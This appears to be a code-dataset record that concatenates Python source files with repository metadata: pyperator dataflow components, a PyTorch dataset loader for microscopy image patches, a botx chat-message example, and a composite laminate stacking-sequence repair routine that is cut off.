"""
count = 0
reset = False
async with self.outputs.count as out:
while True:
pack = await self.inputs.IN.receive_packet()
count += 1
reset = await self.inputs.reset.receive()
if reset:
count = 0
await self.outputs.count.send(count)
await asyncio.sleep(0)
@outport('OUT')
@component
async def WaitRandom(self):
"""
This component randomly sends
an empty packets after having waited for
a random amount of time
:param self:
:return:
"""
async with self.outputs.OUT as out:
while True:
waiting_time = _rand.uniform(0,3)
self.log.debug('Will wait for {} '.format(waiting_time))
await asyncio.sleep(waiting_time)
await self.outputs.OUT.send(True)
await asyncio.sleep(0) | 30.408213 | 110 | 0.614902 | import asyncio
import glob as _glob
import itertools as _iter
import pathlib as _path
import random as _rand
import functools
from pyperator import IP
from pyperator.nodes import Component
from pyperator.utils import InputPort, OutputPort, FilePort
from pyperator.decorators import log_schedule, component, inport, outport
class GeneratorSource(Component):
"""
This is a component that returns a single element from a generator
passed at initalization time to 'gen'
to a single output 'OUT'
"""
def __init__(self, name):
super(GeneratorSource, self).__init__(name)
self.outputs.add(OutputPort('OUT'))
self.inputs.add(InputPort('gen'))
@log_schedule
async def __call__(self):
gen = await self.inputs.gen.receive()
async with self.outputs.OUT:
for g in gen:
await asyncio.wait(self.send_to_all(g))
# await asyncio.sleep(0)
class FormatString(Component):
"""
This component formats
a string "{}" given on
the port "pattern"
the values of the input packets
and sends it to "OUT"
"""
def __init__(self, name):
super(FormatString, self).__init__(name)
self.inputs.add(InputPort('pattern'))
self.outputs.add(OutputPort('OUT'))
async def __call__(self):
pattern = await self.inputs.pattern.receive()
while True:
packets = await self.inputs.receive_packets()
out_string = pattern.format(**{name:p.value for name,p in packets.items()})
await self.outputs.OUT.send(out_string)
await asyncio.sleep(0)
class GlobSource(Component):
"""
This is a component that emits Packets
according to a glob pattern specified
when the component is initialized
"""
def __init__(self, name):
super(GlobSource, self).__init__(name)
self.outputs.add(OutputPort('OUT'))
self.inputs.add(InputPort('pattern'))
@log_schedule
async def __call__(self):
pattern = await self.inputs.pattern.receive()
files = _glob.glob(pattern)
start_message = "using glob pattern {} will emit {} files: {}".format(pattern, len(files), files)
self.log.info(start_message)
for file in files:
p = IP.InformationPacket(_path.Path(file), owner=self)
await self.outputs.OUT.send_packet(p)
await asyncio.sleep(0)
stop_message = "exahusted list of files"
self._log.info(stop_message)
await self.close_downstream()
class Product(Component):
"""
This component generates the
cartesian product of the packets incoming from each ports and
then sends them to the output port `OUT` as bracket IPs.
Alternatively, by providing a function `fun` to the constructor, another
combinatorial function can be used to generate the packets.
"""
def __init__(self, name, fun=lambda packets: _iter.product(*packets)):
super().__init__(name)
self._fun = fun
self.outputs.add(OutputPort('OUT'))
@log_schedule
async def __call__(self):
# Receive all packets
all_packets = {k: [] for k in self.inputs.keys()}
async for packet_dict in self.inputs:
for port, packet in packet_dict.items():
all_packets[port].append(packet)
async with self.outputs.OUT:
for it, p in enumerate(self._fun(all_packets.values())):
# Create substream
substream = [IP.OpenBracket()] + [p1.copy() for p1 in p] + [IP.CloseBracket()]
# Send packets in substream
for p1 in substream:
await self.outputs.OUT.send_packet(p1)
await asyncio.sleep(0)
class FileListSource(Component):
"""
This is a component that emits InformationPackets
from a list of files
"""
def __init__(self, name, files):
super(FileListSource, self).__init__(name)
self.files = files
self.outputs.add(FilePort('OUT'))
@log_schedule
async def __call__(self):
for file in self.files:
p = IP.InformationPacket(file, owner=self)
await self.outputs.OUT.send_packet(p)
await asyncio.sleep(0)
await self.close_downstream()
class ReplacePath(Component):
"""
This is a component that emits InformationPackets
with a path obtained by replacing the input path
"""
def __init__(self, name, pattern):
super(ReplacePath, self).__init__(name)
self.inputs.add(InputPort('IN'))
self.inputs.add(InputPort('pattern'))
self.outputs.add(OutputPort('OUT'))
@log_schedule
async def __call__(self):
pattern = await self.inputs.pattern.receive()
while True:
p = await self.inputs.IN.receive_packet()
p1 = IP.InformationPacket(p.path.replace(*self.pattern), owner=self)
p.drop()
await self.outputs.OUT.send_packet(p1)
await asyncio.sleep(0)
class Split(Component):
"""
This component splits the input tuple into
separate ouputs; the number of elements is given
with `n_outs`
"""
def __init__(self, name):
super(Split, self).__init__(name)
self.inputs.add(InputPort('IN'))
@log_schedule
async def __call__(self):
# Iterate over input stream
async for packet in self.inputs.IN:
if isinstance(packet, IP.OpenBracket):
packet.drop()
data = []
elif isinstance(packet, IP.CloseBracket):
packet.drop()
self._log.debug(
"Splitting '{}'".format(data))
for (output_port_name, output_port), out_packet in zip(self.outputs.items(), data):
await output_port.send_packet(out_packet.copy())
else:
data.append(packet)
await asyncio.sleep(0)
await asyncio.sleep(0)
# class IterSource(Component):
# """
# This component returns a Bracket IP
# from a itertool function such as product
# """
#
# def __init__(self, name, *generators, function=_iter.combinations):
# super(IterSource, self).__init__(name)
# self.generators = generators
# self.outputs.add(OutputPort('OUT'))
# self.function = function
#
# @log_schedule
# async def __call__(self):
# for items in self.function(*self.generators):
# open = IP.OpenBracket()
# await self.outputs.OUT.send_packet(open)
# for item in items:
# packet = IP.InformationPacket(item)
# await self.outputs.OUT.send_packet(packet)
# await self.outputs.OUT.send_packet(IP.CloseBracket())
# await asyncio.sleep(0)
# await self.close_downstream()
class ConstantSource(Component):
"""
This is a component that continously outputs a constant to
the output 'OUT', up to to :repeat: times, infinitely if :repeat: is none
The constant is given to the 'constant' port
"""
def __init__(self, name):
super(ConstantSource, self).__init__(name)
self.outputs.add(OutputPort('OUT'))
self.outputs.add(InputPort('constant'))
self.outputs.add(InputPort('repeat'))
@log_schedule
async def __call__(self):
repeat = await self.inputs.repeat.receive()
constant = await self.inputs.constant.receive()
for i in _iter.count():
if repeat and i >= repeat:
return
else:
# packet = IP.InformationPacket
await asyncio.wait(self.send_to_all(constant))
await asyncio.sleep(0)
class Repeat(Component):
"""
This component receives
from his input once only
and keeps on repeating
it on the output
"""
def __init__(self, name):
super(Repeat, self).__init__(name)
self.inputs.add(InputPort('IN'))
self.outputs.add(OutputPort('OUT'))
async def __call__(self):
packet = await self.inputs.IN.receive_packet()
self.inputs.IN.close()
with self.outputs.OUT:
while True:
self.outputs.OUT.send_packet(packet.copy())
class Filter(Component):
"""
This component filters the input in 'IN' according to the given predicate in the port 'predicate'
and sends it to the output 'OUT' if the predicate is true
"""
def __init__(self, name):
super(Filter, self).__init__(name)
self.inputs.add(InputPort('IN'))
self.inputs.add(InputPort('predicate'))
self.outputs.add(OutputPort('OUT'))
@log_schedule
async def __call__(self):
predicate = self.inputs.predicate.receive()
while True:
data = await self.IN.receive()
filter_result = predicate(data)
# If the predicate is true, the data is sent
if filter_result:
await self.outputs.OUT.send(data)
else:
await asyncio.sleep(0)
await asyncio.sleep(0)
class BroadcastApplyFunction(Component):
"""
This component computes a function of the inputs
and sends it to all outputs
"""
def __init__(self, name, function):
super(BroadcastApplyFunction, self).__init__(name)
self.function = function
@log_schedule
async def __call__(self):
while True:
data = await self.receive()
transformed = self.function(**data)
self.send_to_all(transformed)
await asyncio.sleep(0)
class OneOffProcess(BroadcastApplyFunction):
"""
This class awaits the upstream process once and then keeps on
broadcasting the result to the outputs
"""
def __init__(self, name, function):
super(OneOffProcess, self).__init__(name, function)
@log_schedule
async def __call__(self):
# wait once for the data
data = await self.receive()
while True:
transformed = self.function(**data)
data = transformed
await asyncio.wait(self.send_to_all(data))
await asyncio.sleep(0)
class ShowInputs(Component):
def __init__(self, name):
super(ShowInputs, self).__init__(name)
@log_schedule
async def __call__(self):
while True:
packets = await self.receive_packets()
show_str = "Component {} saw:\n".format(self.name) + "\n".join([str(p) for p in packets.values()])
self._log.debug(show_str)
print(show_str)
@outport('OUT')
@inport('IN')
@component
async def Once(self):
"""
This component
receives from `IN` once and sends
the result to `OUT`. Afterwards, it closes
:param self:
:return:
"""
in_packet = await self.inputs.IN.receive_packet()
await self.outputs.OUT.send_packet(in_packet.copy())
self.inputs.IN.close()
@inport("IN")#: inputs :
@outport("OUT")
@component
async def Repeat(self):
"""
This component receives from `IN` once
and repeats it to `OUT` forever
:param self:
:return:
"""
in_packet= await self.inputs.IN.receive_packet()
async with self.outputs.OUT as out:
while True:
await out.send_packet(in_packet.copy())
await asyncio.sleep(0)
@inport('IN')
@outport('count')
@inport('reset', optional=True)
@component
async def Count(self):
"""
This component receives packets from `IN`
and keeps a count that will be continously
sent to `count`
:param self:
:return:
"""
count = 0
reset = False
async with self.outputs.count as out:
while True:
pack = await self.inputs.IN.receive_packet()
count += 1
reset = await self.inputs.reset.receive()
if reset:
count = 0
await self.outputs.count.send(count)
await asyncio.sleep(0)
@outport('OUT')
@component
async def WaitRandom(self):
"""
This component randomly sends
an empty packets after having waited for
a random amount of time
:param self:
:return:
"""
async with self.outputs.OUT as out:
while True:
waiting_time = _rand.uniform(0,3)
self.log.debug('Will wait for {} '.format(waiting_time))
await asyncio.sleep(waiting_time)
await self.outputs.OUT.send(True)
await asyncio.sleep(0) | 6,296 | 78 | 660 |
2d668f7d5d669b88f263c0a3f968ec638e5cf693 | 13,224 | py | Python | utils.py | sabernn/vit-pytorch | 21a2671aa92adb941a56ae629f6089f550949fb2 | [
"MIT"
] | null | null | null | utils.py | sabernn/vit-pytorch | 21a2671aa92adb941a56ae629f6089f550949fb2 | [
"MIT"
] | null | null | null | utils.py | sabernn/vit-pytorch | 21a2671aa92adb941a56ae629f6089f550949fb2 | [
"MIT"
] | null | null | null | from abc import ABC, abstractmethod
from skimage.io import imread, imshow
import matplotlib.pyplot as plt
import random
import numpy as np
import matplotlib.patches as patches
import os
from torch.utils.data import Dataset, DataLoader
import torch
import glob
if __name__ == "__main__":
from configs import InputParser
dataset = DataGeneratorTorch()
data_loader = DataLoader(dataset, batch_size=4, shuffle=True)
args = InputParser()
data = DataGenerator(args)
training_data_single = data.input_data('cracks','train',plot=False)
training_data_all = data.label_maker()
dataTorch = data.toTorchDataset(is_train=True)
data_loader_lmd = DataLoader(dataTorch, batch_size=4, shuffle=True)
print("Done")
| 35.934783 | 143 | 0.588627 | from abc import ABC, abstractmethod
from skimage.io import imread, imshow
import matplotlib.pyplot as plt
import random
import numpy as np
import matplotlib.patches as patches
import os
from torch.utils.data import Dataset, DataLoader
import torch
import glob
class DataGeneratorBase(ABC):
@abstractmethod
def __init__(self,args):
'''
Coming up with a standardized input data format.
:param args: contains networc parameters including the name of the image dataset (e.g. aps, zeiss, northstar, etc.)
'''
self.dataset=args['dataset']
@abstractmethod
def input_data(self):
'''
:return X: a 4D numpy array containing the image patches and the corresponding color code of each pixel
:return Y: a 4D numpy array containing the image patches and the corresponding label of each pixel
X dimension: (number of samples)x(image height)x(image width)x(number of channels)
Y dimension: (number of samples)x(image height)x(image width)x(1)
'''
pass
class DataGenerator(DataGeneratorBase):
def __init__(self, args):
super().__init__(args)
self.ROOT_DIR = os.path.abspath("") # directory of main.py
self.TRAIN_DIR = os.path.join(self.ROOT_DIR, 'resources', self.dataset, 'train')
self.TEST_DIR = os.path.join(self.ROOT_DIR, 'resources', self.dataset, 'test')
self.categories=["original","pores","cracks"]
self.CAT_TRAIN_DIRS=[""]*len(self.categories)
self.CAT_TEST_DIRS=[""]*len(self.categories)
for i,c in enumerate(self.categories):
self.CAT_TRAIN_DIRS[i]=os.path.join(self.TRAIN_DIR,c)
self.CAT_TEST_DIRS[i]=os.path.join(self.TRAIN_DIR,c)
self.IMG_HEIGHT=self.get_image_dims()[0]
self.IMG_WIDTH=self.get_image_dims()[1]
self.rnd_seed=args['rnd_seed']
self.args=args
def show_data(self,stage='train'):
titles=list(map(lambda x: x.capitalize(), self.categories))
path_orig=os.path.join(self.TRAIN_DIR,self.categories[0])
imgcode=next(os.walk(path_orig))[2][0]
print("$$$$$$$$$$$$")
print("$$$ NOTE $$$: You have {0} images for {1} stage.".format(len(next(os.walk(path_orig))[2]),stage))
print("$$$$$$$$$$$$")
for i,c in enumerate(self.categories):
L=len(self.categories)
plt.subplot(1,L,i+1)
plt.title(titles[i])
plt.xlabel("X")
plt.ylabel("Y")
temp_path=os.path.join(self.TRAIN_DIR,c,imgcode)
img=imread(temp_path)
imshow(temp_path)
plt.show()
pass
def get_image_dims(self):
# path_orig=os.path.join(self.TRAIN_DIR,self.categories[0])
imgcode=next(os.walk(self.CAT_TRAIN_DIRS[0]))[2][0]
path_img=os.path.join(self.CAT_TRAIN_DIRS[0],imgcode)
origimg=imread(path_img)
height=origimg.shape[0] # number of rows
width=origimg.shape[1] # number of columns
return height,width
def input_data(self,fault,stage='train',n_patches=100,patch_size=32,aug_mode='regular',plot=True):
super().input_data()
try:
ind=self.categories.index(fault)
except:
raise ValueError("Saber: '{0}' is not among the specified categories in your data model!".format(fault))
count=0
IMG_CHANNELS=1 # to be revised later
if stage=='train':
random.seed(self.rnd_seed)
imgcode=next(os.walk(self.CAT_TRAIN_DIRS[ind]))[2][0]
oimage=imread(os.path.join(self.CAT_TRAIN_DIRS[0],imgcode))
fimage=imread(os.path.join(self.CAT_TRAIN_DIRS[ind],imgcode))
elif stage=='test':
random.seed(self.rnd_seed+1)
imgcode=next(os.walk(self.CAT_TEST_DIRS[ind]))[2][0]
oimage=imread(os.path.join(self.CAT_TEST_DIRS[0],imgcode))
fimage=imread(os.path.join(self.CAT_TEST_DIRS[ind],imgcode))
else:
raise ValueError("Saber: 'stage' is not defined!")
### CONSIDER OTHER METHODS: Otsu's, Gaussian Mixture
image_thr=thresholder(fimage,254)
if plot:
fig,ax=plt.subplots(1)
ax.imshow(fimage,cmap='gray', vmin=0, vmax=255)
if aug_mode=='random_patches':
X=np.zeros((n_patches,patch_size,patch_size,IMG_CHANNELS),dtype=np.uint8)
Y=np.zeros((n_patches,patch_size,patch_size,1),dtype=np.bool)
L=[None]*n_patches
while count<n_patches:
# plt.figure(2)
# plt.subplot(countx,county,i+1)
upperleft_x=random.choice(range(self.IMG_HEIGHT-patch_size))
upperleft_y=random.choice(range(self.IMG_WIDTH-patch_size))
# plt.xlabel("Upperleft_x = "+str(upperleft_x))
# plt.ylabel("Upperleft_y = "+str(upperleft_y))
# print(upperleft_x)
# print(upperleft_y)
img=oimage[upperleft_x:upperleft_x+patch_size,upperleft_y:upperleft_y+patch_size]
# imshow(img)
img2=image_thr[upperleft_x:upperleft_x+patch_size,upperleft_y:upperleft_y+patch_size]
# fig,ax=plt.subplots(1)
# ax.imshow(image)
img=np.expand_dims(img,axis=-1)
img2=np.expand_dims(img2,axis=-1)
if np.max(img2)>0:
# print(count)
X[count]=img
Y[count]=img2
L[count]=fault
count+=1
if plot:
rect=patches.Rectangle((upperleft_y,upperleft_x),patch_size,patch_size,linewidth=1,
edgecolor='w',facecolor="none")
ax.add_patch(rect)
elif aug_mode=='regular':
max_patches=int(self.IMG_HEIGHT/patch_size)*int(self.IMG_WIDTH/patch_size)
X=np.zeros((max_patches,patch_size,patch_size,IMG_CHANNELS),dtype=np.uint8)
Y=np.zeros((max_patches,patch_size,patch_size,1),dtype=np.bool)
L=[None]*max_patches
print(max_patches)
for i in range(0,self.IMG_HEIGHT-patch_size,patch_size):
for j in range(0,self.IMG_WIDTH-patch_size,patch_size):
upperleft_x=j
upperleft_y=i
img=oimage[upperleft_x:upperleft_x+patch_size,upperleft_y:upperleft_y+patch_size]
img2=image_thr[upperleft_x:upperleft_x+patch_size,upperleft_y:upperleft_y+patch_size]
img=np.expand_dims(img,axis=-1)
img2=np.expand_dims(img2,axis=-1)
if np.max(img2)>0:
# print(count)
X[count]=img
Y[count]=img2
L[count]=fault
count+=1
if plot:
rect=patches.Rectangle((upperleft_y,upperleft_x),patch_size,patch_size,linewidth=1,
edgecolor='w',facecolor="none")
ax.add_patch(rect)
X=X[:count]
Y=Y[:count]
# L[:count]=fault
L=L[:count]
print("Count: "+str(count))
if plot:
plt.title("Selected patches for "+stage.capitalize())
plt.show()
return X,Y,count,L
def label_maker(self,stage='train',n_patches=100,patch_size=32,aug_mode='regular'): # no idea for random mode yet!
n_classes=len(self.categories)
n_faults=n_classes-1 # excluding the original image
n_labels=2**n_faults-1 # all subsets of n_faults minus the null subset
labeled_data=[]
for i in range(n_faults):
imgs,_,_,L=self.input_data(self.categories[i+1],stage=stage,n_patches=n_patches,patch_size=patch_size,aug_mode=aug_mode,plot=False)
J = imgs.shape[0]
lbl = L[0]
for j in range(J):
labeled_data.append([imgs[j],lbl])
# faults.append((imgs,L))
# IMGs=np.concatenate((faults[0][0],faults[1][0]),axis=0)
# LBLs=faults[0][1]+faults[1][1]
# print("stay here...")
# return IMGs,LBLs
return labeled_data
def toTorchDataset(self, is_train):
dataset = DataGeneratorTorchFromLamda(self,is_train)
return dataset
class DataGeneratorTorchFromLamda(Dataset):
def __init__(self,lamda_dataset: DataGenerator, is_train) -> None:
if is_train:
self.imgs_path = lamda_dataset.TRAIN_DIR
else:
self.imgs_path = lamda_dataset.TEST_DIR
# file_list = glob.glob(self.imgs_path + "/*")
# print(file_list)
# self.data = []
self.data = lamda_dataset.label_maker()
# for class_path in file_list:
# class_name = class_path.split("\\")[-1]
# for img_path in glob.glob(class_path + "/*.tiff"):
# self.data.append([img_path, class_name])
# print(self.data)
self.class_map = {}
for i,keys in enumerate(lamda_dataset.categories[1:]):
self.class_map[keys] = i
self.img_dim = (lamda_dataset.args['patch_size'],lamda_dataset.args['patch_size'])
def __len__(self):
return len(self.data)
def __getitem__(self, index):
# img_path, class_name = self.data[index]
# img = imread(img_path)
img, class_name = self.data[index]
class_id = self.class_map[class_name]
img_tensor = torch.from_numpy(img).float()
img_tensor = img_tensor.permute(2, 0, 1)
class_id = torch.tensor([class_id]).squeeze(-1)
return img_tensor, class_id
class DataGeneratorTorch(Dataset):
def __init__(self,DIR="resources/zeiss/train/") -> None:
self.imgs_path = DIR
file_list = glob.glob(self.imgs_path + "*")
print(file_list)
self.data = []
for class_path in file_list:
class_name = class_path.split("\\")[-1]
for img_path in glob.glob(class_path + "/*.tiff"):
self.data.append([img_path, class_name])
print(self.data)
self.class_map = {"orig" : 0, "pores": 1, "cracks": 2}
self.img_dim = (2000,2000)
def __len__(self):
return len(self.data)
def __getitem__(self, index):
img_path, class_name = self.data[index]
img = imread(img_path)
class_id = self.class_map[class_name]
img_tensor = torch.from_numpy(img)
class_id = torch.tensor([class_id])
# class_id = class_id.squeeze(-1).squeeze(-1)
return img_tensor, class_id
def show_data(dataset='zeiss',stage='train',plot=True):
# original, pores, cracks
ROOT_DIR = os.path.abspath("")
path_stage = os.path.join(ROOT_DIR, 'resources', dataset, stage)
categories=["original","pores","cracks"]
titles=["Original", "Pores", "Cracks"]
category=categories[1]
path_cat=os.path.join(path_stage,category)
imgcode=next(os.walk(path_cat))[2][0]
print("$$$$$$$$$$$$")
print("$$$ NOTE $$$: You have {0} images for {1} stage.".format(len(next(os.walk(path_cat))[2]),stage))
print("$$$$$$$$$$$$")
path_img=os.path.join(path_cat,imgcode)
origimg=imread(path_img)
if plot==True:
for i,c in enumerate(categories):
plt.subplot(1,3,i+1)
plt.title(titles[i])
plt.xlabel("X")
plt.ylabel("Y")
temp_path=os.path.join(path_stage,c,imgcode)
img=imread(temp_path)
imshow(temp_path)
plt.show()
width=origimg.shape[0]
height=origimg.shape[1]
return width,height
def thresholder(orig_image,margin):
img=orig_image.copy()
img[img<margin]=0
return img
def cumulative_loss(loss):
L=len(loss)
closs=[loss[0]]
for i in range(L-1):
closs.append(closs[i]+loss[i+1])
return closs
def get_flops():
g = tf.Graph()
run_meta = tf.compat.v1.RunMetadata()
with g.as_default():
A = tf.Variable(tf.random.normal([25,16]))
B = tf.Variable(tf.random.normal([16,9]))
C = tf.matmul(A,B)
opts = tf.compat.v1.profiler.ProfileOptionBuilder.float_operation()
flops = tf.compat.v1.profiler.profile(g, run_meta=run_meta, cmd='op', options=opts)
if flops is not None:
print('Flops should be ~',2*25*16*9)
print('TF stats gives',flops.total_float_ops)
if __name__ == "__main__":
from configs import InputParser
dataset = DataGeneratorTorch()
data_loader = DataLoader(dataset, batch_size=4, shuffle=True)
args = InputParser()
data = DataGenerator(args)
training_data_single = data.input_data('cracks','train',plot=False)
training_data_all = data.label_maker()
dataTorch = data.toTorchDataset(is_train=True)
data_loader_lmd = DataLoader(dataTorch, batch_size=4, shuffle=True)
print("Done")
| 11,115 | 839 | 505 |
b9b60d6ad866148924253fa5069e7e37944c754b | 429 | py | Python | docs/src/development/sending_data/sending_data0.py | ExpressApp/pybotx | 97c8b1ce5d45a05567ed01d545cb43174a2dcbb9 | [
"MIT"
] | 13 | 2021-01-21T12:43:10.000Z | 2022-03-23T11:11:59.000Z | docs/src/development/sending_data/sending_data0.py | ExpressApp/pybotx | 97c8b1ce5d45a05567ed01d545cb43174a2dcbb9 | [
"MIT"
] | 259 | 2020-02-26T08:51:03.000Z | 2022-03-23T11:08:36.000Z | docs/src/development/sending_data/sending_data0.py | ExpressApp/pybotx | 97c8b1ce5d45a05567ed01d545cb43174a2dcbb9 | [
"MIT"
] | 5 | 2019-12-02T16:19:22.000Z | 2021-11-22T20:33:34.000Z | from uuid import UUID
from botx import Bot, SendingMessage
bot = Bot()
CHAT_ID = UUID("1f972f5e-6d17-4f39-be5b-f7e20f1b4d13")
BOT_ID = UUID("cc257e1c-c028-4181-a055-01e14ba881b0")
CTS_HOST = "my-cts.example.com"
| 22.578947 | 54 | 0.678322 | from uuid import UUID
from botx import Bot, SendingMessage
bot = Bot()
CHAT_ID = UUID("1f972f5e-6d17-4f39-be5b-f7e20f1b4d13")
BOT_ID = UUID("cc257e1c-c028-4181-a055-01e14ba881b0")
CTS_HOST = "my-cts.example.com"
async def some_function() -> None:
message = SendingMessage(
text="You were chosen by random.",
bot_id=BOT_ID,
host=CTS_HOST,
chat_id=CHAT_ID,
)
await bot.send(message)
| 191 | 0 | 23 |
c528820d645082e6638ab570ab1da8de5ad7a2d4 | 9,573 | py | Python | src/repair_ss.py | noemiefedon/RELAY | 1bf9c27ee1bcf1be0a7652fcca0ea38dd47b14b8 | [
"MIT"
] | 1 | 2020-12-07T22:18:22.000Z | 2020-12-07T22:18:22.000Z | src/repair_ss.py | noemiefedon/RELAY | 1bf9c27ee1bcf1be0a7652fcca0ea38dd47b14b8 | [
"MIT"
] | null | null | null | src/repair_ss.py | noemiefedon/RELAY | 1bf9c27ee1bcf1be0a7652fcca0ea38dd47b14b8 | [
"MIT"
] | 1 | 2021-12-02T22:19:02.000Z | 2021-12-02T22:19:02.000Z | # -*- coding: utf-8 -*-
"""
Repair strategy
- repair_ss:
attempts at repairing a stacking sequence for the following constraints:
- damage tolerance
- contiguity
- disorientation
- 10% rule
- balance
"""
__version__ = '2.0'
__author__ = 'Noemie Fedon'
import sys
import numpy as np
import numpy.matlib
sys.path.append(r'C:\RELAY')
from src.parameters import Parameters
from src.constraints import Constraints
from src.objectives import objectives
from src.pretty_print import print_ss, print_list_ss
from src.repair_10_bal import repair_10_bal
from src.repair_10_bal import calc_mini_10
from src.repair_membrane import repair_membrane
from src.repair_flexural import repair_flexural
from src.repair_diso_contig import repair_diso_contig_list
from src.one_stack import check_ss_manufacturability
from src.lampam_functions import calc_lampam
def repair_ss(
ss, constraints, parameters, lampam_target, obj_no_constraints=None,
count_obj=False):
"""
repairs stacking sequences to meet design and manufacturing guidelines
and evaluates the performance of the repaired stacking sequence
The repair process is deterministic and attempts at conducting minimal
modification of the original stacking sequence with a preference for
modifying outer plies that have the least influence on out-of-plane
properties.
step 1: repair for the 10% rule and balance
step 2: refinement for in-plane lamination parameter convergence
step 3: repair for disorientation and contiguity
step 4: refinement for out-of-plane lamination parameter convergence
(step 5: attribute a poor objective function value to unrepaired layups)
OUTPUTS
-
INPUTS
- ss: stacking sequence of the laminate
- lampam_target: lamination parameter targets
- constraints: instance of the class Constraints
- parameters: instance of the class Parameters
- count_obj: flag to count the number of objective function calls
(- obj_no_constraints: objective function value of the initial stacking
sequence with no consideration of design and manufacturing constraints)
"""
ss_ini = np.copy(ss)
mini_10 = calc_mini_10(constraints, ss.size)
# print('before repair')
# print_ss(ss_ini)
#--------------------------------------------------------------------------
# step 1 / repair for the 10% rule and balance
#--------------------------------------------------------------------------
ss, ply_queue = repair_10_bal(ss, mini_10, constraints)
# print('after repair 10 and balance')
# print_ss(ss)
# print(ply_queue)
#--------------------------------------------------------------------------
# step 2 / improvement of the in-plane lamination parameter convergence
#--------------------------------------------------------------------------
ss_list, ply_queue_list, _ = repair_membrane(
ss=ss,
ply_queue=ply_queue,
mini_10=mini_10,
in_plane_coeffs=parameters.weighting_finalA,
parameters=parameters,
constraints=constraints,
lampam_target=lampam_target)
# print('after repair for membrane properties')
# for ind in range(len(ss_list)):
# print('ind', ind)
# print('ss_list[ind]', ss_list[ind])
# print('ply_queue_list[ind]', ply_queue_list[ind])
# if not is_ten_percent_rule(constraints, stack=ss_list[ind],
# ply_queue=ply_queue_list[ind]):
# print('lampam_target', lampam_target[0:4])
# raise Exception('10% rule not satisfied membrane')
# print('ss_list[0]')
# print_ss(ss_list[0])
# print('ply_queue_list[0]', ply_queue_list[0])
#--------------------------------------------------------------------------
# step 3 / repair for disorientation and contiguity
#--------------------------------------------------------------------------
ss, completed_inward, completed_outward, ind = repair_diso_contig_list(
ss_list, ply_queue_list, constraints,
parameters.n_D1)
# print('completed_inward, completed_outward, ind',
# completed_inward, completed_outward, ind)
if not completed_outward:
# print('unsuccessful repair for disorientation and/or contiguity')
if obj_no_constraints is None:
if count_obj:
return ss_ini, False, 0
else:
return ss_ini, False
if count_obj:
return ss_ini, False, 1e10, 0
else:
return ss_ini, False, 1e10
# print('successful repair for disorientation and/or contiguity')
# print_ss(ss)
#--------------------------------------------------------------------------
# step 4 / improvement of the out-of-plane lamination parameter convergence
#--------------------------------------------------------------------------
ss = repair_flexural(
ss=ss,
out_of_plane_coeffs=parameters.weighting_finalD,
lampam_target=lampam_target,
constraints=constraints,
parameters=parameters,
count_obj=count_obj)
if count_obj:
ss, n_obj_func_D_calls = ss
# print(' after repair')
# print_ss(ss)
# print('lampam_target', lampam_target)
if obj_no_constraints is None:
if count_obj:
return ss, True, n_obj_func_D_calls
else:
return ss, True
#--------------------------------------------------------------------------
# step 5 /
#--------------------------------------------------------------------------
obj_no_constraints = objectives(
lampam=calc_lampam(ss, constraints),
lampam_target=lampam_target,
lampam_weightings=parameters.lampam_weightings_final,
constraints=constraints,
parameters=parameters)
if count_obj:
return ss, True, 1e10, n_obj_func_D_calls
else:
return ss, True, 1e10
if __name__ == "__main__":
print('\n*** Test for the function repair_ss ***')
constraints = Constraints(
sym=True,
bal=True,
ipo=True,
dam_tol=False,
rule_10_percent=True,
diso=True,
contig=True,
delta_angle=45,
n_contig=5,
percent_0=10,
percent_45=0,
percent_90=10,
percent_135=0,
percent_45_135=10,
set_of_angles=[0, 45, -45, 90])
ss = np.array([45, 90, 45, 90, -45, -45, -45, -45, 90, 45, 45, 45,
90, -45, 0, 0, 0, -45, 90, 45, 45, 45, 90, -45,
-45, -45, -45, 90, 45, 90, 45], int)
ss_target = 60*np.ones((1,), dtype=int)
lampam_target = calc_lampam(ss_target)
#==========================================================================
# Optimiser Parameters
#==========================================================================
### Techniques to enforce the constraints
# repair to improve the convergence towards the in-plane lamination parameter
# targets
repair_membrane_switch = True
# repair to improve the convergence towards the out-of-plane lamination
# parameter targets
repair_flexural_switch = True
# balanced laminate scheme
balanced_scheme = False
# coefficient for the proportion of the laminate thickness that can be modified
# during the refinement for membrane properties in the repair process
p_A = 80
# number of plies in the last permutation during repair for disorientation
# and/or contiguity
n_D1 = 6
# number of ply shifts tested at each step of the re-designing process during
# refinement for flexural properties
n_D2 = 10
# number of times are redesigned during the refinement of flexural properties
n_D3 = 2
# Lamination parameters to be considered in the multi-objective functions
optimisation_type = 'D'
set_of_angles = np.array([-45, 0, 45, 90], int)
if optimisation_type == 'A':
if set_of_angles is np.array([-45, 0, 45, 90], int):
lampam_to_be_optimised = np.array([1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0])
else:
lampam_to_be_optimised = np.array([1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0])
if optimisation_type == 'D':
if set_of_angles is np.array([-45, 0, 45, 90], int):
lampam_to_be_optimised = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0])
else:
lampam_to_be_optimised = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1])
if optimisation_type == 'AD':
if set_of_angles is np.array([-45, 0, 45, 90], int):
lampam_to_be_optimised = np.array([1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0])
else:
lampam_to_be_optimised = np.array([1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1])
# Lamination parameters sensitivities from the first-lebel optimiser
first_level_sensitivities = np.ones((12,), float)
parameters = Parameters(
constraints=constraints,
p_A=p_A,
n_D1=n_D1,
n_D2=n_D2,
n_D3=n_D3,
first_level_sensitivities=first_level_sensitivities,
lampam_to_be_optimised=lampam_to_be_optimised,
repair_membrane_switch=repair_membrane_switch,
repair_flexural_switch=repair_flexural_switch)
ss, completed, n_obj_func_D_calls = repair_ss(
ss, constraints, parameters, lampam_target, count_obj=True)
print('Repair successful?', completed)
print_ss(ss, 20)
print('n_obj_func_D_calls', n_obj_func_D_calls)
check_ss_manufacturability(ss, constraints)
| 39.8875 | 83 | 0.598872 | # -*- coding: utf-8 -*-
"""
Repair strategy
- repair_ss:
attempts at repairing a stacking sequence for the following constraints:
- damage tolerance
- contiguity
- disorientation
- 10% rule
- balance
"""
__version__ = '2.0'
__author__ = 'Noemie Fedon'
import sys
import numpy as np
import numpy.matlib
sys.path.append(r'C:\RELAY')
from src.parameters import Parameters
from src.constraints import Constraints
from src.objectives import objectives
from src.pretty_print import print_ss, print_list_ss
from src.repair_10_bal import repair_10_bal
from src.repair_10_bal import calc_mini_10
from src.repair_membrane import repair_membrane
